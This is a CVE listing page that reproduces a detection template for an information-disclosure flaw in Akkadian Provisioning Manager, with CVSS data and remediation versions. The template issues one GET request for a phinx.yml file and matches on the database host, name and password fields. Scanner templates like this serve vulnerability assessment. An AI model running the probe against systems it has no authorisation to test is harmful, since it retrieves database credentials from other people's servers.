CVE-2021-31581: Akkadian Provisioning Manager - Information Disclosure

2025-08-01 Akkadian Provisioning Manager PoC Public

Description

Akkadian Provisioning Manager is susceptible to information disclosure. The restricted shell provided can be escaped by abusing the Edit MySQL Configuration command. This command launches a standard VI editor interface which can then be escaped.

PoC

id: CVE-2021-31581

info:
  name: Akkadian Provisioning Manager - Information Disclosure
  author: geeknik
  severity: medium
  description: Akkadian Provisioning Manager is susceptible to information disclosure. The restricted shell provided can be escaped by abusing the Edit MySQL Configuration command. This command launches a standard VI editor interface which can then be escaped.
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as user credentials or system configuration details.
  remediation: This issue was resolved in Akkadian OVA appliance version 3.0 and later, Akkadian Provisioning Manager 5.0.2 and later, and Akkadian Appliance Manager 3.3.0.314-4a349e0 and later.
  reference:
    - https://threatpost.com/unpatched-bugs-provisioning-cisco-uc/166882/
    - https://www.rapid7.com/blog/post/2021/06/08/akkadian-provisioning-manager-multiple-vulnerabilities-disclosure/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-31581
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 4.4
    cve-id: CVE-2021-31581
    cwe-id: CWE-269,CWE-312
    epss-score: 0.01217
    epss-percentile: 0.67072
    cpe: cpe:2.3:a:akkadianlabs:ova_appliance:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: akkadianlabs
    product: ova_appliance
  tags: cve,cve2021,akkadian,mariadb,disclosure,akkadianlabs,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/pme/database/pme/phinx.yml"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "host:"
          - "name:"
          - "pass:"
        condition: and

      - type: word
        negative: true
        words:
          - "html>"

      - type: status
        status:
          - 200
# digest: 490a0046304402200cd0c9b62758b0c7c943b98f202fef2e3d5946327cb6299d6713753721b8ce7602203c4f176a289ba636c32a59e21c495893f7695d256cec8c6a2e41e8c6de8aa4f8:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities